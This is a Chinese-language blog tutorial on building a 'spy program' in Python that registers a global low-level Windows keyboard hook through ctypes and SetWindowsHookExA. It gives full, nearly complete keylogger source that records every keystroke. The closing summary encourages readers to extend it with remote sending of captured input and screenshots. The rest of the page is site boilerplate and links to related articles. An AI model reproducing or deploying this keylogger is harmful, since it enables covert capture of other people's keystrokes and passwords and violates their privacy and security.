网站首页 > 技术文章 正文
我们常听说:如果要操作某个软件或者监听某个软件的话,可以使用钩子(Hook)钩住软件,那这是如何操作的呢?用Python又如何实现呢?
本教程我们将通过注册Hook打造一款间谍程序,来监听win系统的笔记本,先给大家演示下效果吧!

更多python源码分享,领取请私信回复【源码】
一、Hook 技术
程序的基本原理在于通过注册Hook,记录系统事件。
那么什么是Hook呢?
Hook 技术又叫做钩子函数,系统在调用函数之前,钩子程序就先捕获该消息,钩子函数先得到控制权,这时钩子函数既可以加工处理(改变)该函数的执行行为,还可以强制结束消息的传递
注册Hook时我们需要使用到两个DLL库:user32.dll和kernel32.dll。这两个DLL有什么用处呢:
- user32.dll:是Windows用户界面相关应用程序接口,用于包括Windows处理,基本用户界面等特性,如创建窗口和发送消息
- kernel32.dll:控制着系统的内存管理、数据的输入输出操作和中断处理
二、实现
了解了钩子的用处,那我们就来正式开始实现吧!
1.注册钩子
首先我们需要先注册Hook到系统上,通过user32.dll中的SetWindowsHookExA函数我们可以在系统上注册钩子。
通过查看 微软官方文档(https://docs.microsoft.com/zh-cn/windows/win32/api/winuser/nf-winuser-setwindowshookexa) ,我们看到SetWindowsHookExA函数的参数及参数类型如上所示。
我们简单介绍一下关于这几个参数的含义:
- idHook:钩子的类型,可以监听消息、键盘、鼠标等等,这里我们来监视低级键盘输入事件作为案例演示!
- lpfn:钩子函数,这里就表示你监听到事件后要怎么处理,核心作用!
- hmod:DLL句柄(类似编号),我们可以使用kernel32中的GetModuleHandleW来获取句柄
- dwThreadId:我们填入0代表与同一桌面上所有的线程关联
上图中的代码我们可以看出使用的是C++语法,这时候Python中的 ctypes库 就可以助我们一臂之力!
ctypes 是 Python 的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 DLL 或共享库中的函数。可使用该模块以纯 Python 形式对这些库进行封装。
Python使用ctypes库注册钩子代码:
from ctypes import CDLL
user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")
user32.SetWindowsHookExA(13, handleProc, kernel32.GetModuleHandleW(), 0)
更多关于 ctypes库 使用教程可查看Python官方文档:https://docs.python.org/zh-cn/3.7/library/ctypes.html
2.编写钩子函数
上面我们说过 监视低级键盘输入事件(WH_KEYBOARD_LL)作为案例演示!
而监听键盘事件(WH_KEYBOARD_LL)会使用LowLevelKeyboardProc回调函数,同时我们也需要在Python定义它!

更多python源码分享,领取请私信回复【源码】
我们再次使用Python的 ctypes库定义一个回调函数!
def hookProc(nCode, wParam, lParam):
if nCode < 0:
return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
else:
# 此处插入我们的代码
pass
return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
3.删除Hook
最后在我们退出程序时还需要删除Hook,不然大量的Hook会使系统运行缓慢。
虽然在Windows 7及更高版本上,该钩子会被静默删除而不被调用。
但是应用程序无法知道挂钩是否已删除,我们还是主动进行删除。
删除需要使用user32.dll的UnhookWindowsHookEx。
def uninstallHookProc(hooked):
if hooked is None:
return
user32.UnhookWindowsHookEx(hooked)
hooked = None
完整的钩子函数:
def hookProc(nCode, wParam, lParam):
if nCode < 0:
return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
else:
if wParam == 256:
if 162 == lParam.contents.value:
print("Ctrl pressed, call Hook uninstall()")
uninstallHookProc(hooked)
sys.exit(-1)
capsLock = user32.GetKeyState(20)
if lParam.contents.value == 13:
print("\n")
elif capsLock:
print(chr(lParam.contents.value), end="")
else:
print(chr(lParam.contents.value + 32), end="")
return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
4.声明原型
钩子函数已经写好了,但是这是Python函数,如何将它转成c++函数呢?这样windows才能读取。
通过ctypes文档我们可以得知Windows下使用WINFUNCTYPE来声明函数原型!

更多python源码分享,领取请私信回复【源码】
将创建好的Python函数声明为c++函数:
# 创建声明,c_int表示函数入参类型
HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))
# 声明函数原型
handleProc = HOOKPROC(hookProc)
最后我们将已经已经声明好的函数原型handleProc,传入最开始注册的钩子函数里:
user32.SetWindowsHookExA(13, handleProc, kernel32.GetModuleHandleW(), 0)
5.完整代码
上面的4步基本是主要的流程,一些更详细的操作这里不再过多介绍,给出全部代码,不到100行。
import sys
from ctypes import *
from ctypes.wintypes import DWORD, HHOOK, HINSTANCE, MSG, WPARAM, LPARAM
user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")
class KBDLLHOOKSTRUCT(Structure):
_fields_ = [
('vkCode', DWORD),
('scanCode', DWORD),
('flags', DWORD),
('time', DWORD),
('dwExtraInfo', DWORD)]
def uninstallHookProc(hooked):
if hooked is None:
return
user32.UnhookWindowsHookEx(hooked)
hooked = None
def hookProc(nCode, wParam, lParam):
if nCode < 0:
return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
else:
if wParam == 256:
if 162 == lParam.contents.value:
print("Ctrl pressed, call Hook uninstall()")
uninstallHookProc(hooked)
sys.exit(-1)
capsLock = user32.GetKeyState(20)
# kb_struct = cast(lParam, POINTER(KBDLLHOOKSTRUCT))
if lParam.contents.value==13:
print("\n")
elif capsLock:
print(chr(lParam.contents.value),end="")
else:
print(chr(lParam.contents.value+32),end="")
return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
def startKeyLog():
msg = MSG()
user32.GetMessageA(byref(msg), 0, 0, 0)
def installHookProc(hooked, pointer):
hooked = user32.SetWindowsHookExA(
13,
pointer,
kernel32.GetModuleHandleW(),
0
)
if not hooked:
return False
return True
HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))
pointer = HOOKPROC(hookProc)
hooked = None
if installHookProc(hooked, pointer):
print("Hook installed")
try:
msg = MSG()
user32.GetMessageA(byref(msg), 0, 0, 0)
except KeyboardInterrupt as kerror:
uninstallHookProc(hooked)
print("Hook uninstall...")
else:
print("Hook installed error")
Windows系统的同学可以试试效果哦~
三、总结
本次教程给大家简单地介绍了下:在Python中如何使用ctypes库调用Windows API。
当然,上面我们监听到消息之后还可以远程发送或者截屏保存等等操作都可以,期待大家的骚操作哦!
如果觉得我的分享不错,欢迎大家随手点赞。
更多爬虫、数据分析、全栈开发、人工智能学习资料自取
私信@Python阿执回复关键词【资料】
猜你喜欢
- 2024-12-19 提高效率的 10 个 Python 调试技巧
- 2024-12-19 python-IO多路复用(select、poll、epoll)
- 2024-12-19 一篇文章搞懂 Python select 模块
- 2024-12-19 每个python人都离不开的12个python库
- 2024-12-19 使用 Python 和 OpenCV 进行面部识别 - 应用于监控、人脸门禁和考勤等
- 2024-12-19 使用 Python3 uWSGI 实现并发和监控的 Web 应用部署(44)
- 2024-12-19 Python 自动化: eip、cen监控数据对接到 grafana
- 2024-12-19 python 你需要知道的
- 2024-12-19 监控老板一举一动 99行python助你无风险摸鱼
- 2024-12-19 系统监控利器:轻松掌握Python的psutil包
- 05-25Python 3.14 t-string 要来了,它与 f-string 有何不同?
- 05-25Python基础元素语法总结
- 05-25Python中的变量是什么东西?
- 05-25新手常见的python报错及解决方案
- 05-2511-Python变量
- 05-2510个每个人都是需要知道Python问题
- 05-25Python编程:轻松掌握函数定义、类型及其参数传递方式
- 05-25Python基础语法
- 257℃Python短文,Python中的嵌套条件语句(六)
- 257℃python笔记:for循环嵌套。end=""的作用,图形打印
- 256℃PythonNet:实现Python与.Net代码相互调用!
- 251℃Python操作Sqlserver数据库(多库同时异步执行:增删改查)
- 251℃Python实现字符串小写转大写并写入文件
- 106℃原来2025是完美的平方年,一起探索六种平方的算吧
- 90℃Python 和 JavaScript 终于联姻了!PythonMonkey 要火?
- 81℃Ollama v0.4.5-v0.4.7 更新集合:Ollama Python 库改进、新模型支持
- 最近发表
- 标签列表
-
- python中类 (31)
- python 迭代 (34)
- python 小写 (35)
- python怎么输出 (33)
- python 日志 (35)
- python语音 (31)
- python 工程师 (34)
- python3 安装 (31)
- python音乐 (31)
- 安卓 python (32)
- python 小游戏 (32)
- python 安卓 (31)
- python聚类 (34)
- python向量 (31)
- python大全 (31)
- python次方 (33)
- python桌面 (32)
- python总结 (34)
- python浏览器 (32)
- python 请求 (32)
- python 前端 (32)
- python验证码 (33)
- python 题目 (32)
- python 文件写 (33)
- python中的用法 (32)